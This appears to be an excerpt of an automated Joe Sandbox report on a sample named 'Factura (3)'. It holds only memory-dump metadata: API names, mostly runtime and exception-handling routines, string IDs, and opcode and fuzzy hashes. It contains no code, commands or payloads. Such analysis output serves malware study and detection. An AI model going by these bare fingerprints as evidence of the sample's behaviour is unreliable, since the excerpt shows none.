                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: AdjustPointer
                                                      • String ID:
                                                      • API String ID: 1740715915-0
                                                      • Opcode ID: d4445c26989423fbbb70a8eafd3c38cfcd01928838610fbd60e46ebe8693f3f8
                                                      • Instruction ID: 0afcef29c1bda58b185c871540cf627a89385f3a5b1de87dc86b8bba47a158c2
                                                      • Opcode Fuzzy Hash: d4445c26989423fbbb70a8eafd3c38cfcd01928838610fbd60e46ebe8693f3f8
                                                      • Instruction Fuzzy Hash: 46B1DB61B0DE5AA1EA6DFF1390C0578E290AF44B80F8544B5CECD87795DE3CE4E1AB24
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: _set_statfp
                                                      • String ID:
                                                      • API String ID: 1156100317-0
                                                      • Opcode ID: 531ec001749944e30a9d6009bf9ae8df4748624afa1a8fb5c67025f4f1a1f96a
                                                      • Instruction ID: 4279e209ac51e867f78bafa2fac682257e3f4539a4d50dc633ab3112a9e83fba
                                                      • Opcode Fuzzy Hash: 531ec001749944e30a9d6009bf9ae8df4748624afa1a8fb5c67025f4f1a1f96a
                                                      • Instruction Fuzzy Hash: 2581F822B0DA4665F26AAF36B4C037AE2D0BF95354F844371ED6F92594DF3CE481A610
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: char_traits$Concurrency::details::EmptyQueue::StructuredWork$Max_valueMin_value
                                                      • String ID:
                                                      • API String ID: 3432838598-0
                                                      • Opcode ID: 8b4ef932259451e5b47ea0ad590b63d43647a5924eedafdc8e7f0c9a60c10db8
                                                      • Instruction ID: 9e5ebffad2469333e02be7aed7c5bf1ec664391dd91aa610337a346b3785ae1c
                                                      • Opcode Fuzzy Hash: 8b4ef932259451e5b47ea0ad590b63d43647a5924eedafdc8e7f0c9a60c10db8
                                                      • Instruction Fuzzy Hash: 6C412A27A1CB8592CA24EB16F49026EE7A1FBC9784F500166FA8D43B6ACF3CD1449F50
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: _set_statfp
                                                      • String ID:
                                                      • API String ID: 1156100317-0
                                                      • Opcode ID: e65ba792651367d839098e214d5891407b2dde01c0b567b7a4e043ebbfca8b6f
                                                      • Instruction ID: ca2fbe6fa3d9fcaca09539c11593a0244fb553b56824af1451f162ccf6455cae
                                                      • Opcode Fuzzy Hash: e65ba792651367d839098e214d5891407b2dde01c0b567b7a4e043ebbfca8b6f
                                                      • Instruction Fuzzy Hash: 7611E666E6CE0321F75C3A16F4E9339A340AF58370FE44234EA7FE62D68E5C94417522
                                                      APIs
                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF7340EE03F,?,?,00000000,00007FF7340EE2DA,?,?,?,?,?,00007FF7340EE266), ref: 00007FF7340F7F63
                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7340EE03F,?,?,00000000,00007FF7340EE2DA,?,?,?,?,?,00007FF7340EE266), ref: 00007FF7340F7F82
                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7340EE03F,?,?,00000000,00007FF7340EE2DA,?,?,?,?,?,00007FF7340EE266), ref: 00007FF7340F7FAA
                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7340EE03F,?,?,00000000,00007FF7340EE2DA,?,?,?,?,?,00007FF7340EE266), ref: 00007FF7340F7FBB
                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7340EE03F,?,?,00000000,00007FF7340EE2DA,?,?,?,?,?,00007FF7340EE266), ref: 00007FF7340F7FCC
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Value
                                                      • String ID:
                                                      • API String ID: 3702945584-0
                                                      • Opcode ID: d4de03ca6d5f8685dfd289fe5fbbe4e7d6bcd97dff717548317c0db56e8f5eeb
                                                      • Instruction ID: 56b33bfa65faa1f8a1750cc0dd54e2f6ba26894a4368a1d15b8ac372b572cec0
                                                      • Opcode Fuzzy Hash: d4de03ca6d5f8685dfd289fe5fbbe4e7d6bcd97dff717548317c0db56e8f5eeb
                                                      • Instruction Fuzzy Hash: 4D118E11B0A60262FA9C7B37A5D10B9E1C15F847B0EC843B4E82D877D5EE2CF4167621
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Value
                                                      • String ID:
                                                      • API String ID: 3702945584-0
                                                      • Opcode ID: c5989110b8010fe8408217dc186f18f61c7b563f3eb4e20ac6df03ad7ec94710
                                                      • Instruction ID: daa112161e54b888734a8b2bd2b379b93a1d17b9b13d03d9d374b53051561627
                                                      • Opcode Fuzzy Hash: c5989110b8010fe8408217dc186f18f61c7b563f3eb4e20ac6df03ad7ec94710
                                                      • Instruction Fuzzy Hash: AD113D11B0A60362F99CBA3354D10B9F1C10F4A770ED807B5D93E8A2D2EE2CB8166631
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                      • API String ID: 3215553584-1196891531
                                                      • Opcode ID: 5eb145913d3343604472cfe0388461154ec951036e7515a65bacf91879f874e3
                                                      • Instruction ID: e990b1effd90c7c6b30daa97a72168707fe3d9f603eb894f6a3acdec60ebc553
                                                      • Opcode Fuzzy Hash: 5eb145913d3343604472cfe0388461154ec951036e7515a65bacf91879f874e3
                                                      • Instruction Fuzzy Hash: 1481D431F0E206A5F77D6E2B95C4238FBD0DF15748FE450B1C90DC6699CA2DA845B3A2
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: CallEncodePointerTranslator
                                                      • String ID: MOC$RCC
                                                      • API String ID: 3544855599-2084237596
                                                      • Opcode ID: 6923b9501380832990e45b27c507c7c64dc35f75449c16bfab4da47b21d7df6c
                                                      • Instruction ID: 338e7f9a007734bbf513292fd41f81a4842b4b08e8c24d6d5b659dce018a6cc5
                                                      • Opcode Fuzzy Hash: 6923b9501380832990e45b27c507c7c64dc35f75449c16bfab4da47b21d7df6c
                                                      • Instruction Fuzzy Hash: 2091F473B08B859AE715DF66E4802ACBBB0FB44788F50416AEB8C57755CF38D1A5DB00
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                      • String ID: csm
                                                      • API String ID: 2395640692-1018135373
                                                      • Opcode ID: 1a4949c0ea1086f68affbb26a41fdb3df8eed441f895190c80f5e2a87e27c6d4
                                                      • Instruction ID: 83cb08a3463cdb25486f7cde2179d372f9ad34b2d546f791aedab8b1aaebc034
                                                      • Opcode Fuzzy Hash: 1a4949c0ea1086f68affbb26a41fdb3df8eed441f895190c80f5e2a87e27c6d4
                                                      • Instruction Fuzzy Hash: 3151E531B19A05EADB18EF26E084A7CB395EB40B88F904171DACE83384DF7CE491DB14
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: CallEncodePointerTranslator
                                                      • String ID: MOC$RCC
                                                      • API String ID: 3544855599-2084237596
                                                      • Opcode ID: 2b300c59cc9fd1ea1e542b589aff1002b137ba27e66d08c623b88e9895aee7d6
                                                      • Instruction ID: 3e57d8623b9a3d9d462f878e38eb3438d15842a5520e7ebdcc7d366d988f9fc7
                                                      • Opcode Fuzzy Hash: 2b300c59cc9fd1ea1e542b589aff1002b137ba27e66d08c623b88e9895aee7d6
                                                      • Instruction Fuzzy Hash: E161A432A08B8995DB34AF16E4803AAF7A0FB88794F444265EB8C53B55DF7CD1E0CB14
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                      • String ID: csm$csm
                                                      • API String ID: 3896166516-3733052814
                                                      • Opcode ID: 65d4a7bc1d0d0d895a1cf153372a4cfdb2e16185853312814b7f248943856b60
                                                      • Instruction ID: 5314d9846f84c66212d34a3bbc05e38708f954738156f3257b82d50616235946
                                                      • Opcode Fuzzy Hash: 65d4a7bc1d0d0d895a1cf153372a4cfdb2e16185853312814b7f248943856b60
                                                      • Instruction Fuzzy Hash: 3351B432A09A45D6DB68EF2391C4368B7A0FB44B88F544175DB9C87795CF3CE4A09B18
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: 5627846810b7840d04b29f13ab5916d6bf3e1d58606ed61d3c5a842b833f617e
                                                      • Instruction ID: e814ed138c4e4741f0010d6a452c6a58ce3580d4bf7008c3ce5be3ee9056d611
                                                      • Opcode Fuzzy Hash: 5627846810b7840d04b29f13ab5916d6bf3e1d58606ed61d3c5a842b833f617e
                                                      • Instruction Fuzzy Hash: 8171512260DA89D5E668AF56E4803BEF7A0EB80740F900175E68D87A95CF3CD494EF24
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                      • String ID:
                                                      • API String ID: 2718003287-0
                                                      • Opcode ID: 777fbad731c06f54c77a9aea4c15951a02d3929d06ec450856ffd67d6e2cd436
                                                      • Instruction ID: 7c64187c897aca554f1bb7e236507e65aebe06641c8651cd3ab9bf81d640d6b6
                                                      • Opcode Fuzzy Hash: 777fbad731c06f54c77a9aea4c15951a02d3929d06ec450856ffd67d6e2cd436
                                                      • Instruction Fuzzy Hash: BCD12232B09B8199E714DF76D4C02ACB7B1FB44B98B804276CE9D97B89DE38D406DB50
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::EmptyQueue::StructuredWorkfrexplswprintf
                                                      • String ID:
                                                      • API String ID: 2911421839-0
                                                      • Opcode ID: 23b3957c33b713597f9c4863a235fa6b0b2778af4deacfe5bb9874e9912d05c4
                                                      • Instruction ID: 5558b2ac241f3ba61efd5e49e6f9363bd94082ad6fc43ff92ca88549d11932e8
                                                      • Opcode Fuzzy Hash: 23b3957c33b713597f9c4863a235fa6b0b2778af4deacfe5bb9874e9912d05c4
                                                      • Instruction Fuzzy Hash: 9A614E3260CAC595D665AB26F4903AEFB60EBC5380F900175E7CD83A9ADE3CD484DB50
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: GetcvtLocinfo::_std::_$Concurrency::cancellation_token_source::~cancellation_token_sourceGetvals
                                                      • String ID:
                                                      • API String ID: 272587748-0
                                                      • Opcode ID: 8c68f46551777554ff82005fabf25d234fb373a92e91dc05e1b277fa42d2f5a0
                                                      • Instruction ID: ea027bfef254846c2b6d5b6e2ec94d6e6b536503f4602ce2d120f7e09f32f230
                                                      • Opcode Fuzzy Hash: 8c68f46551777554ff82005fabf25d234fb373a92e91dc05e1b277fa42d2f5a0
                                                      • Instruction Fuzzy Hash: 16414C32A08BC591DA24EB16E4903EEA3A0FBD8784F904076DACC87769DF7CC195DB50
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                      • String ID:
                                                      • API String ID: 2933794660-0
                                                      • Opcode ID: f1d6d1889c2798bb0420719893d6d1ca4d12ecf4e30f05c87899f262d9974fba
                                                      • Instruction ID: 17b427a07ce9d52b052d37f03669daae2bfd95d51cd2804c9776b3fb4f570b09
                                                      • Opcode Fuzzy Hash: f1d6d1889c2798bb0420719893d6d1ca4d12ecf4e30f05c87899f262d9974fba
                                                      • Instruction Fuzzy Hash: E0117026B54F0599EB04EF61F8842B873A4F718798F840E31DA6D837A8EF78D154C350
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: __except_validate_context_record
                                                      • String ID: csm$csm
                                                      • API String ID: 1467352782-3733052814
                                                      • Opcode ID: 42d89c5ad33d7bd92d738027da93574dcf54f7694659ae518c3cc543189d5069
                                                      • Instruction ID: 0e556dbe837470f81d823fcb7d676bf806ea1e7cbb8ee93bfc6d160d53f4546d
                                                      • Opcode Fuzzy Hash: 42d89c5ad33d7bd92d738027da93574dcf54f7694659ae518c3cc543189d5069
                                                      • Instruction Fuzzy Hash: 1B710232B09A8596DB29AF26D0D067DBBB0FB40B84F448172DE8C87B85CB3CD4A1D714
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: CreateFrameInfo__except_validate_context_record
                                                      • String ID: csm
                                                      • API String ID: 2558813199-1018135373
                                                      • Opcode ID: 0f740e8bcad2f777fba0f68efa58b46ec1834093898652b2ce8256f8fb4a285d
                                                      • Instruction ID: 2e9f8e00c5774fb85b2d17c9f5058895d65afe4f89becd64768c7a19b1fc2eaa
                                                      • Opcode Fuzzy Hash: 0f740e8bcad2f777fba0f68efa58b46ec1834093898652b2ce8256f8fb4a285d
                                                      • Instruction Fuzzy Hash: 97515B36719B8696D624EF16E18026DB7A4FB88B90F400174EBCD87B56CF39D4A0DB14
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: ErrorFileLastWrite
                                                      • String ID: U
                                                      • API String ID: 442123175-4171548499
                                                      • Opcode ID: 443bb9a5d29fbdb7e161cc3baf9247f0ce557e4f934ffa7003bd4cb58d2d0713
                                                      • Instruction ID: 827156773aaf13108b71b6ac5f403400550b10a0ee5d424dd829d0c4bce67a53
                                                      • Opcode Fuzzy Hash: 443bb9a5d29fbdb7e161cc3baf9247f0ce557e4f934ffa7003bd4cb58d2d0713
                                                      • Instruction Fuzzy Hash: 6241B422B29A4591DB64EF26E4843A9A7A0FB88784F954031EE8DC7758DF3CD441DB50
                                                      APIs
                                                      • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7340E7ECF), ref: 00007FF7340E8668
                                                      • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7340E7ECF), ref: 00007FF7340E86A9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: ExceptionFileHeaderRaise
                                                      • String ID: csm
                                                      • API String ID: 2573137834-1018135373
                                                      • Opcode ID: da88a774326f10a492e3d8199edcbd95a9ac470012e81d63375fc4bc411e8847
